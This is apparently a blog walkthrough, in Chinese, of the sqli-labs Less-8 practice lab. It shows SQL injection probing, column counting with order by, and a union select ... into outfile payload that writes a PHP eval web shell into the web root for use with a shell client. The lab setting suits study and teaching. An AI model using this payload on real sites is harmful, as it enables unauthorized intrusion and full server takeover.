zoukankan      html  css  js  c++  java
  • Less(8)

    1.先判断注入类型

      

       (1)首先看到要求,要求传一个ID参数,并且要求是数字型的;?id=1

        

       (2)再输入:?id=1 and 1=1

        

       (3)输入:?id=1 and 1=2

        

         因为(2)(3)没有变化,所以不是数字型

      (4)输入:?id=1'

        

         提示消失了,说明有错误

      (5)加上--+,我们再输入:?id=1' --+

        

         结合(4)(5),我们可以看出来参数id='1'

    2..对列数进行判断

      (1)输入?id=1' order by 3 --+

        

       (2)?id=1' order by 4 --+

        

         3正常,4错误没有显示,说明是3列

    3连接菜刀

      (1)输入:?id=-1' union select 1,2,'<?php @eval($_POST["crow"]); ?>' into outfile "C:\phpstudy\PHPTutorial\WWW\sqli-labs-master\Less-8\my.php" --+

        

       (2)在菜刀中添加

        

  • 相关阅读:
    ios初级必看视频
    Md5加密
    Jmail发送邮件
    NPOI Helper文档
    jquery 序列化
    mvc DropDownList默认选项
    获取HTML
    EntityFramework Reverse POCO Generator工具
    全选反选
    mvc导出EXCEL
  • 原文地址:https://www.cnblogs.com/meng-yu37/p/12274035.html
Copyright © 2011-2022 走看看